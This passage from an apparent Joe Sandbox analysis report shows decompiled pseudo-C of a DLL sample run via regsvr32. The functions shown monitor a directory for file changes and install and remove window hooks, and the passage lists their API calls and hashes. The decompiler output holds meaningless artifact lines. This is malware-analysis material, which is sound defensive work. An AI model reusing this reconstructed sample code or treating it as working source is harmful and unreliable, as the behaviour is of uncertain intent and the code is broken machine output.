                                                                                                                												_push(_t353);
                                                                                                                												_t233 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                												_push(_t233 ^ _t369);
                                                                                                                												_t193 = _t369 + 0xc; // 0xf210014e
                                                                                                                												 *[fs:0x0] = _t193;
                                                                                                                												_t356 = _t296;
                                                                                                                												_t194 = _t369 + 0x1c; // 0xf210015e
                                                                                                                												_push(_t194);
                                                                                                                												 *(_t369 + 0x18) = 0;
                                                                                                                												E10001FF0(_t356 + 0x78);
                                                                                                                												_t197 = _t369 + 8; // 0xf2100146
                                                                                                                												_t238 = CreateThread(0, 0, E10015540, _t356, 0xfffffff1, _t197);
                                                                                                                												__eflags = _t238;
                                                                                                                												_t330 = 0 | _t238 != 0x00000000;
                                                                                                                												 *(_t356 + 0xe8) = _t238;
                                                                                                                												_t240 =  *((intOrPtr*)(_t369 + 0x1c)) + 0xfffffff0;
                                                                                                                												 *((intOrPtr*)(_t369 + 0x14)) = 0xffffffff;
                                                                                                                												_t357 = _t330;
                                                                                                                												asm("lock xadd [ecx], edx");
                                                                                                                												__eflags = (_t330 | 0xffffffff) - 1;
                                                                                                                												if((_t330 | 0xffffffff) - 1 <= 0) {
                                                                                                                													_push(_t240);
                                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 4))))();
                                                                                                                												}
                                                                                                                												 *[fs:0x0] =  *((intOrPtr*)(_t369 + 0xc));
                                                                                                                												return _t357;
                                                                                                                											} else {
                                                                                                                												__edx =  *__eax;
                                                                                                                												__ecx = __eax;
                                                                                                                												 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
                                                                                                                												__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                												 *(__esp + 0x14) =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
                                                                                                                												__ecx = __esp + 0x18;
                                                                                                                												__edx = __esp + 0x98;
                                                                                                                												 *(__esp + 0x66c) = 1;
                                                                                                                												__eax = E1003CBFC(__ebx, __edx, __edx, __esp + 0x18);
                                                                                                                												__eflags = __eax;
                                                                                                                												if(__eax != 0) {
                                                                                                                													__edi = __edi | 0xffffffff;
                                                                                                                													__eflags = __edi;
                                                                                                                												} else {
                                                                                                                													__edi =  *(__esp + 0x94);
                                                                                                                												}
                                                                                                                												__eax = __esp + 0x18;
                                                                                                                												__ecx = __esp + 0x74;
                                                                                                                												__eax = E1003CBFC(__ebx, __edx, __esp + 0x74, __esp + 0x18);
                                                                                                                												__eflags = __eax;
                                                                                                                												if(__eax != 0) {
                                                                                                                													__esi = __esi | 0xffffffff;
                                                                                                                													__eflags = __esi;
                                                                                                                												} else {
                                                                                                                													__esi =  *(__esp + 0x74);
                                                                                                                												}
                                                                                                                												__edx = __esp + 0x18;
                                                                                                                												__eax = __esp + 0x50;
                                                                                                                												__eax = E1003CBFC(__ebx, __edx, __esp + 0x50, __edx);
                                                                                                                												__eflags = __eax;
                                                                                                                												if(__eax != 0) {
                                                                                                                													__eflags = __eax;
                                                                                                                												} else {
                                                                                                                													__eax =  *(__esp + 0x54);
                                                                                                                												}
                                                                                                                												_push(__edi);
                                                                                                                												_push(__esi);
                                                                                                                												__ecx = __esp + 0x20;
                                                                                                                												__eax =  *(__ebp + 0x74);
                                                                                                                												__esi = __ebp + 0x94;
                                                                                                                												__ecx = __esi;
                                                                                                                												__eax = E10026562(__ecx, 1, 0,  *(__ebp + 0x74), 0, 0, 0, 0);
                                                                                                                												_push(0x10059f18);
                                                                                                                												L21:
                                                                                                                												_push(2);
                                                                                                                												_push(0);
                                                                                                                												E1002637C(_t353);
                                                                                                                												_t342 = _t367 + 0x124;
                                                                                                                												E1002637C(_t353, 0, 3, _t342);
                                                                                                                												_t352 =  *((intOrPtr*)(_t367 + 0x14));
                                                                                                                												E1002637C(_t353, 0, 1, _t352);
                                                                                                                												_t259 = _t352 - 0x10;
                                                                                                                												 *((intOrPtr*)(_t367 + 0x664)) = 0xffffffff;
                                                                                                                												asm("lock xadd [ecx], edx");
                                                                                                                												_t391 = (_t342 | 0xffffffff) - 1;
                                                                                                                												L99:
                                                                                                                												if(_t391 <= 0) {
                                                                                                                													_push(_t259);
                                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t259)) + 4))))();
                                                                                                                												}
                                                                                                                												goto L101;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L107;
                                                                                                                									case 2:
                                                                                                                										__eflags =  *(__ebp + 0x88);
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											 *((intOrPtr*)(__esp + 0x40)) = E1003CEA4(__ecx, __edx, __eflags, 0);
                                                                                                                											 *((intOrPtr*)(__esp + 0x44)) = __edx;
                                                                                                                											__eax = E100173A6();
                                                                                                                											__ecx = 0;
                                                                                                                											__eflags = __eax;
                                                                                                                											_t142 = __eax != 0;
                                                                                                                											__eflags = _t142;
                                                                                                                											__ecx = 0 | _t142;
                                                                                                                											_t143 = __eax;
                                                                                                                											__eax = __ebp;
                                                                                                                											__ebp = _t143;
                                                                                                                											asm("rol dword [ebp+0x7d840fc9], 0x2");
                                                                                                                											 *__eax =  *__eax + __al;
                                                                                                                											__eflags =  *__eax;
                                                                                                                										}
                                                                                                                										goto L107;
                                                                                                                									case 3:
                                                                                                                										__eflags =  *(__ebp + 0x84);
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											 *((intOrPtr*)(__esp + 0x28)) = E1003CEA4(__ecx, __edx, __eflags, 0);
                                                                                                                											 *((intOrPtr*)(__esp + 0x2c)) = __edx;
                                                                                                                											__eax = E100173A6();
                                                                                                                											__ecx = 0;
                                                                                                                											__eflags = __eax;
                                                                                                                											_t110 = __eax != 0;
                                                                                                                											__eflags = _t110;
                                                                                                                											__ecx = 0 | _t110;
                                                                                                                											_t111 = __eax;
                                                                                                                											__eax = __ebp;
                                                                                                                											__ebp = _t111;
                                                                                                                											asm("rol dword [ebp+0x5840fc9], 0x4");
                                                                                                                											 *__eax =  *__eax + __al;
                                                                                                                											__eflags =  *__eax;
                                                                                                                										}
                                                                                                                										goto L107;
                                                                                                                									case 4:
                                                                                                                										__eflags =  *(__ebp + 0x84);
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L101;
                                                                                                                										} else {
                                                                                                                											 *(__esp + 0x20) = E1003CEA4(__ecx, __edx, __eflags, 0);
                                                                                                                											 *((intOrPtr*)(__esp + 0x24)) = __edx;
                                                                                                                											__eax = E100173A6();
                                                                                                                											__ecx = 0;
                                                                                                                											__eflags = __eax;
                                                                                                                											_t79 = __eax != 0;
                                                                                                                											__eflags = _t79;
                                                                                                                											__ecx = 0 | _t79;
                                                                                                                											_t80 = __eax;
                                                                                                                											__eax = __ebp;
                                                                                                                											__ebp = _t80;
                                                                                                                											asm("rol dword [ebp-0x7d7bf037], 0x5");
                                                                                                                											 *__eax =  *__eax + __al;
                                                                                                                											__eflags =  *__eax;
                                                                                                                										}
                                                                                                                										goto L107;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L107;
                                                                                                                							L101:
                                                                                                                							 *(_t362 + 0x90) =  &( *(_t362 + 0x90)->nLength);
                                                                                                                							E10003500(_t362 + 0x74, 0x10058714,  *(_t362 + 0x90));
                                                                                                                							_t365 = _t367 + 0xc;
                                                                                                                							_t325 = _t365 + 0x50;
                                                                                                                						} while (ReadDirectoryChangesW( *(_t362 + 0xec), _t365 + 0x344, 0x228, 1, 0x17f, _t365 + 0x50, 0, 0) != 0);
                                                                                                                					}
                                                                                                                					goto L102;
                                                                                                                				}
                                                                                                                				L107:
                                                                                                                			}






































                                                                                                                0x10015eb8
                                                                                                                0x10015eb9
                                                                                                                0x10015eba
                                                                                                                0x10015ebb
                                                                                                                0x10015ebc
                                                                                                                0x10015ebd
                                                                                                                0x10015ebe
                                                                                                                0x10015ebf
                                                                                                                0x10015ec0
                                                                                                                0x10015ec2
                                                                                                                0x10015ecd
                                                                                                                0x10015ece
                                                                                                                0x10015ecf
                                                                                                                0x10015ed0
                                                                                                                0x10015ed7
                                                                                                                0x10015ed8
                                                                                                                0x10015edc
                                                                                                                0x10015ee2
                                                                                                                0x10015ee4
                                                                                                                0x10015eeb
                                                                                                                0x10015eec
                                                                                                                0x10015ef4
                                                                                                                0x10015ef9
                                                                                                                0x10015f0a
                                                                                                                0x10015f12
                                                                                                                0x10015f14
                                                                                                                0x10015f17
                                                                                                                0x10015f21
                                                                                                                0x10015f24
                                                                                                                0x10015f2f
                                                                                                                0x10015f34
                                                                                                                0x10015f39
                                                                                                                0x10015f3b
                                                                                                                0x10015f41
                                                                                                                0x10015f45
                                                                                                                0x10015f45
                                                                                                                0x10015f4d
                                                                                                                0x10015f59
                                                                                                                0x10015825
                                                                                                                0x10015825
                                                                                                                0x10015827
                                                                                                                0x1001582c
                                                                                                                0x1001582e
                                                                                                                0x10015831
                                                                                                                0x10015835
                                                                                                                0x1001583a
                                                                                                                0x10015842
                                                                                                                0x1001584d
                                                                                                                0x10015855
                                                                                                                0x10015857
                                                                                                                0x10015862
                                                                                                                0x10015862
                                                                                                                0x10015859
                                                                                                                0x10015859
                                                                                                                0x10015859
                                                                                                                0x10015865
                                                                                                                0x1001586a
                                                                                                                0x1001586f
                                                                                                                0x10015877
                                                                                                                0x10015879
                                                                                                                0x10015881
                                                                                                                0x10015881
                                                                                                                0x1001587b
                                                                                                                0x1001587b
                                                                                                                0x1001587b
                                                                                                                0x10015884
                                                                                                                0x10015889
                                                                                                                0x1001588e
                                                                                                                0x10015896
                                                                                                                0x10015898
                                                                                                                0x100158a0
                                                                                                                0x1001589a
                                                                                                                0x1001589a
                                                                                                                0x1001589a
                                                                                                                0x100158a3
                                                                                                                0x100158a4
                                                                                                                0x100158a6
                                                                                                                0x100158b5
                                                                                                                0x100158c6
                                                                                                                0x100158ce
                                                                                                                0x100158d0
                                                                                                                0x100158d5
                                                                                                                0x100157a4
                                                                                                                0x100157a4
                                                                                                                0x100157a6
                                                                                                                0x100157aa
                                                                                                                0x100157af
                                                                                                                0x100157bd
                                                                                                                0x100157c2
                                                                                                                0x100157cd
                                                                                                                0x100157d2
                                                                                                                0x100157d5
                                                                                                                0x100157e6
                                                                                                                0x100157eb
                                                                                                                0x10015e0b
                                                                                                                0x10015e0b
                                                                                                                0x10015e11
                                                                                                                0x10015e15
                                                                                                                0x10015e15
                                                                                                                0x00000000
                                                                                                                0x10015e0b
                                                                                                                0x1001581f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015be4
                                                                                                                0x10015beb
                                                                                                                0x00000000
                                                                                                                0x10015bf1
                                                                                                                0x10015bfb
                                                                                                                0x10015bff
                                                                                                                0x10015c03
                                                                                                                0x10015c08
                                                                                                                0x10015c0a
                                                                                                                0x10015c0c
                                                                                                                0x10015c0c
                                                                                                                0x10015c0c
                                                                                                                0x10015c0d
                                                                                                                0x10015c0d
                                                                                                                0x10015c0d
                                                                                                                0x10015c0e
                                                                                                                0x10015c15
                                                                                                                0x10015c15
                                                                                                                0x10015c15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015a5c
                                                                                                                0x10015a63
                                                                                                                0x00000000
                                                                                                                0x10015a69
                                                                                                                0x10015a73
                                                                                                                0x10015a77
                                                                                                                0x10015a7b
                                                                                                                0x10015a80
                                                                                                                0x10015a82
                                                                                                                0x10015a84
                                                                                                                0x10015a84
                                                                                                                0x10015a84
                                                                                                                0x10015a85
                                                                                                                0x10015a85
                                                                                                                0x10015a85
                                                                                                                0x10015a86
                                                                                                                0x10015a8d
                                                                                                                0x10015a8d
                                                                                                                0x10015a8d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100158df
                                                                                                                0x100158e6
                                                                                                                0x00000000
                                                                                                                0x100158ec
                                                                                                                0x100158f6
                                                                                                                0x100158fa
                                                                                                                0x100158fe
                                                                                                                0x10015903
                                                                                                                0x10015905
                                                                                                                0x10015907
                                                                                                                0x10015907
                                                                                                                0x10015907
                                                                                                                0x10015908
                                                                                                                0x10015908
                                                                                                                0x10015908
                                                                                                                0x10015909
                                                                                                                0x10015910
                                                                                                                0x10015910
                                                                                                                0x10015910
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100156b8
                                                                                                                0x00000000
                                                                                                                0x10015e17
                                                                                                                0x10015e17
                                                                                                                0x10015e2e
                                                                                                                0x10015e39
                                                                                                                0x10015e40
                                                                                                                0x10015e60
                                                                                                                0x100155e3
                                                                                                                0x00000000
                                                                                                                0x100155dd
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,02000000,00000000), ref: 100155A2
                                                                                                                • ReadDirectoryChangesW.KERNEL32 ref: 100155D5
                                                                                                                • _memset.LIBCMT ref: 100155F8
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000063,00000000,00000000), ref: 10015624
                                                                                                                • _memset.LIBCMT ref: 10015666
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000063,00000000,00000000), ref: 1001568A
                                                                                                                • __localtime64_s.LIBCMT ref: 10015714
                                                                                                                • __localtime64_s.LIBCMT ref: 10015733
                                                                                                                • __localtime64_s.LIBCMT ref: 10015755
                                                                                                                • __time64.LIBCMT ref: 10015801
                                                                                                                • __localtime64_s.LIBCMT ref: 1001586F
                                                                                                                • __localtime64_s.LIBCMT ref: 1001588E
                                                                                                                • __localtime64_s.LIBCMT ref: 1001584D
                                                                                                                  • Part of subcall function 1003CBFC: _memset.LIBCMT ref: 1003CC3D
                                                                                                                • __time64.LIBCMT ref: 100156CB
                                                                                                                  • Part of subcall function 1003CEA4: GetSystemTimeAsFileTime.KERNEL32(?), ref: 1003CEAD
                                                                                                                  • Part of subcall function 1003CEA4: __aulldiv.LIBCMT ref: 1003CECD
                                                                                                                • ReadDirectoryChangesW.KERNEL32 ref: 10015E5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s$_memset$ByteChangesCharDirectoryFileMultiReadTimeWide__time64$CreateSystem__aulldiv
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 3191029907-941173414
                                                                                                                • Opcode ID: e71dbc740f024e664c01ea7bef284a5c5423d5538d5568a68f8339887dd9582a
                                                                                                                • Instruction ID: 820a8a13c6e6a38639e8ef58e3aabad2606d5e5cab2837dfce96017240da5163
                                                                                                                • Opcode Fuzzy Hash: e71dbc740f024e664c01ea7bef284a5c5423d5538d5568a68f8339887dd9582a
                                                                                                                • Instruction Fuzzy Hash: DCE1A071644740ABE324CB64DC42F9BB3E8EB84711F144A1CF6599F1D1EBB2EA44CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1001B5A3(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t54;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t56;
                                                                                                                				void* _t59;
                                                                                                                				long _t60;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t66;
                                                                                                                				short _t72;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t76;
                                                                                                                				long _t83;
                                                                                                                				signed int _t86;
                                                                                                                				signed short _t87;
                                                                                                                				signed int _t88;
                                                                                                                				int _t94;
                                                                                                                				void* _t106;
                                                                                                                				long* _t108;
                                                                                                                				long _t110;
                                                                                                                				signed int _t111;
                                                                                                                				CHAR* _t112;
                                                                                                                				intOrPtr _t113;
                                                                                                                				void* _t116;
                                                                                                                				void* _t119;
                                                                                                                				intOrPtr _t120;
                                                                                                                
                                                                                                                				_t119 = __eflags;
                                                                                                                				_t105 = __edi;
                                                                                                                				_push(0x148);
                                                                                                                				E1003D24F(E10052FD7, __ebx, __edi, __esi);
                                                                                                                				_t110 =  *(_t116 + 0x10);
                                                                                                                				_t94 =  *(_t116 + 0xc);
                                                                                                                				_push(0x100172b8);
                                                                                                                				 *(_t116 - 0x120) = _t110;
                                                                                                                				_t54 = E1002D69C(_t94, 0x10070af4, __edi, _t110, _t119);
                                                                                                                				_t120 = _t54;
                                                                                                                				_t97 = 0 | _t120 == 0x00000000;
                                                                                                                				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                                                                                				_t121 = _t120 == 0;
                                                                                                                				if(_t120 == 0) {
                                                                                                                					_t54 = E1001729E(_t94, _t97, __edi, _t110, _t121);
                                                                                                                				}
                                                                                                                				if( *(_t116 + 8) == 3) {
                                                                                                                					_t106 =  *_t110;
                                                                                                                					_t111 =  *(_t54 + 0x14);
                                                                                                                					_t55 = E10023187(_t94, _t106, _t111, __eflags);
                                                                                                                					__eflags = _t111;
                                                                                                                					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                					 *(_t116 - 0x124) = _t56;
                                                                                                                					if(_t111 != 0) {
                                                                                                                						L7:
                                                                                                                						__eflags =  *0x10070efc;
                                                                                                                						if( *0x10070efc == 0) {
                                                                                                                							L12:
                                                                                                                							__eflags = _t111;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								__eflags =  *0x10070ad4;
                                                                                                                								if( *0x10070ad4 != 0) {
                                                                                                                									L19:
                                                                                                                									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10070ad4; // 0x0
                                                                                                                									if(__eflags != 0) {
                                                                                                                										L23:
                                                                                                                										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                										__eflags = _t59;
                                                                                                                										 *(_t116 - 0x14) = _t59;
                                                                                                                										if(_t59 != 0) {
                                                                                                                											_t112 = "AfxOldWndProc423";
                                                                                                                											_t64 = GetPropA(_t94, _t112);
                                                                                                                											__eflags = _t64;
                                                                                                                											if(_t64 == 0) {
                                                                                                                												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                                                                                												_t66 = GetPropA(_t94, _t112);
                                                                                                                												__eflags = _t66 -  *(_t116 - 0x14);
                                                                                                                												if(_t66 ==  *(_t116 - 0x14)) {
                                                                                                                													GlobalAddAtomA(_t112);
                                                                                                                													SetWindowLongA(_t94, 0xfffffffc, E1001B45F);
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                										L27:
                                                                                                                										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                                                                                										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                                                                                										__eflags =  *(_t116 - 0x124);
                                                                                                                										_t110 = _t60;
                                                                                                                										if( *(_t116 - 0x124) != 0) {
                                                                                                                											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                                                                                											_t50 = _t105 + 0x28;
                                                                                                                											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                                                                                											__eflags =  *_t50;
                                                                                                                										}
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                								_t113 = 0x30;
                                                                                                                								E1003BB70(_t106, _t116 - 0x154, 0, _t113);
                                                                                                                								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                                                                                								_push(_t116 - 0x154);
                                                                                                                								_push("#32768");
                                                                                                                								_push(0);
                                                                                                                								_t72 = E100185B8(_t94, _t97, _t106, "#32768", __eflags);
                                                                                                                								__eflags = _t72;
                                                                                                                								 *0x10070ad4 = _t72;
                                                                                                                								if(_t72 == 0) {
                                                                                                                									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                                                                                									__eflags = _t74;
                                                                                                                									if(_t74 == 0) {
                                                                                                                										goto L23;
                                                                                                                									}
                                                                                                                									 *((char*)(_t116 - 0x19)) = 0;
                                                                                                                									_t76 = E1003BD06(_t116 - 0x118, "#32768");
                                                                                                                									__eflags = _t76;
                                                                                                                									if(_t76 == 0) {
                                                                                                                										goto L27;
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							E100231D3(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                                                                                							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                                                                                							E10019C57(_t111, _t116, _t94);
                                                                                                                							 *((intOrPtr*)( *_t111 + 0x50))();
                                                                                                                							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                                                                                							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001A398);
                                                                                                                							__eflags = _t83 - E1001A398;
                                                                                                                							if(_t83 != E1001A398) {
                                                                                                                								 *_t108 = _t83;
                                                                                                                							}
                                                                                                                							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                                                                                							__eflags =  *(_t116 - 0x14);
                                                                                                                							if( *(_t116 - 0x14) != 0) {
                                                                                                                								_push( *(_t116 - 0x18));
                                                                                                                								_push(0);
                                                                                                                								E10022A6E();
                                                                                                                							}
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                						__eflags = _t86 & 0x00010000;
                                                                                                                						if((_t86 & 0x00010000) != 0) {
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						_t87 =  *(_t106 + 0x28);
                                                                                                                						__eflags = _t87 - 0xffff;
                                                                                                                						if(_t87 <= 0xffff) {
                                                                                                                							 *(_t116 - 0x18) = 0;
                                                                                                                							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                                                                                							_t87 = _t116 - 0x18;
                                                                                                                						}
                                                                                                                						_t88 = E10018830(_t87, "ime");
                                                                                                                						__eflags = _t88;
                                                                                                                						_pop(_t97);
                                                                                                                						if(_t88 == 0) {
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                                                                                					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					__eflags = _t56;
                                                                                                                					if(_t56 != 0) {
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                                                                                					L30:
                                                                                                                					return E1003D2D2(_t94, _t105, _t110);
                                                                                                                				}
                                                                                                                			}



























                                                                                                                0x00000000
                                                                                                                0x1001b76e
                                                                                                                0x00000000
                                                                                                                0x1001b729
                                                                                                                0x1001b687
                                                                                                                0x1001b68c
                                                                                                                0x1001b693
                                                                                                                0x1001b69c
                                                                                                                0x1001b6b2
                                                                                                                0x1001b6b4
                                                                                                                0x1001b6ba
                                                                                                                0x1001b6bc
                                                                                                                0x1001b6be
                                                                                                                0x1001b6be
                                                                                                                0x1001b6c6
                                                                                                                0x1001b6ca
                                                                                                                0x1001b6ce
                                                                                                                0x1001b6d2
                                                                                                                0x1001b6d8
                                                                                                                0x1001b6db
                                                                                                                0x1001b6dd
                                                                                                                0x1001b6dd
                                                                                                                0x00000000
                                                                                                                0x1001b6d2
                                                                                                                0x1001b635
                                                                                                                0x1001b63b
                                                                                                                0x1001b640
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b646
                                                                                                                0x1001b649
                                                                                                                0x1001b64e
                                                                                                                0x1001b65b
                                                                                                                0x1001b65f
                                                                                                                0x1001b665
                                                                                                                0x1001b665
                                                                                                                0x1001b66e
                                                                                                                0x1001b673
                                                                                                                0x1001b676
                                                                                                                0x1001b677
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b677
                                                                                                                0x1001b614
                                                                                                                0x1001b61b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b621
                                                                                                                0x1001b623
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b5e9
                                                                                                                0x1001b5f1
                                                                                                                0x1001b7ee
                                                                                                                0x1001b7f3
                                                                                                                0x1001b7f3

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1001B5AD
                                                                                                                  • Part of subcall function 1002D69C: __EH_prolog3.LIBCMT ref: 1002D6A3
                                                                                                                • CallNextHookEx.USER32 ref: 1001B5F1
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 1001B635
                                                                                                                • GlobalGetAtomNameA.KERNEL32 ref: 1001B65F
                                                                                                                • SetWindowLongA.USER32 ref: 1001B6B4
                                                                                                                • _memset.LIBCMT ref: 1001B6FE
                                                                                                                • GetClassLongA.USER32(?,000000E0), ref: 1001B72E
                                                                                                                • GetClassNameA.USER32(?,?,00000100), ref: 1001B74F
                                                                                                                • GetWindowLongA.USER32(?,000000FC), ref: 1001B773
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001B78D
                                                                                                                • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001B798
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001B7A0
                                                                                                                • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001B7A8
                                                                                                                • SetWindowLongA.USER32 ref: 1001B7B6
                                                                                                                • CallNextHookEx.USER32 ref: 1001B7CE
                                                                                                                • UnhookWindowsHookEx.USER32 ref: 1001B7E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                • API String ID: 1191297049-4034971020
                                                                                                                • Opcode ID: b54799d27170606899ff4ec85ba67eada30c06d86bff9faef27e8f29348c1080
                                                                                                                • Instruction ID: 7f2f15e19391607922dd917d31160da0776a06f29d3e743d5f2990234a6b7258
                                                                                                                • Opcode Fuzzy Hash: b54799d27170606899ff4ec85ba67eada30c06d86bff9faef27e8f29348c1080
                                                                                                                • Instruction Fuzzy Hash: 8061A175504A26AFDB11DB60CD89BAE7BB8EF08361F114195F905AB191DB34DEC0CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 46%
                                                                                                                			E100169EF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t190;
                                                                                                                				intOrPtr* _t200;
                                                                                                                				signed int _t203;
                                                                                                                				signed int _t206;
                                                                                                                				intOrPtr* _t208;
                                                                                                                				intOrPtr _t211;
                                                                                                                				char _t230;
                                                                                                                				CHAR* _t236;
                                                                                                                				intOrPtr _t237;
                                                                                                                				signed short _t240;
                                                                                                                				signed int _t241;
                                                                                                                				signed int _t242;
                                                                                                                				signed int _t250;
                                                                                                                				signed int* _t257;
                                                                                                                				signed int _t258;
                                                                                                                				signed int _t277;
                                                                                                                				signed short* _t278;
                                                                                                                				signed short* _t279;
                                                                                                                				signed int _t290;
                                                                                                                				intOrPtr* _t293;
                                                                                                                				CHAR* _t295;
                                                                                                                				intOrPtr* _t296;
                                                                                                                				intOrPtr _t297;
                                                                                                                				signed int** _t299;
                                                                                                                				void* _t300;
                                                                                                                				void* _t301;
                                                                                                                				void* _t302;
                                                                                                                				void* _t313;
                                                                                                                
                                                                                                                				_push(0x7c);
                                                                                                                				_t190 = E1003D1E6(E10052A1F, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                				_t257 = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                					L78:
                                                                                                                					return E1003D2BE(_t190);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t300 - 0x54)) = 0;
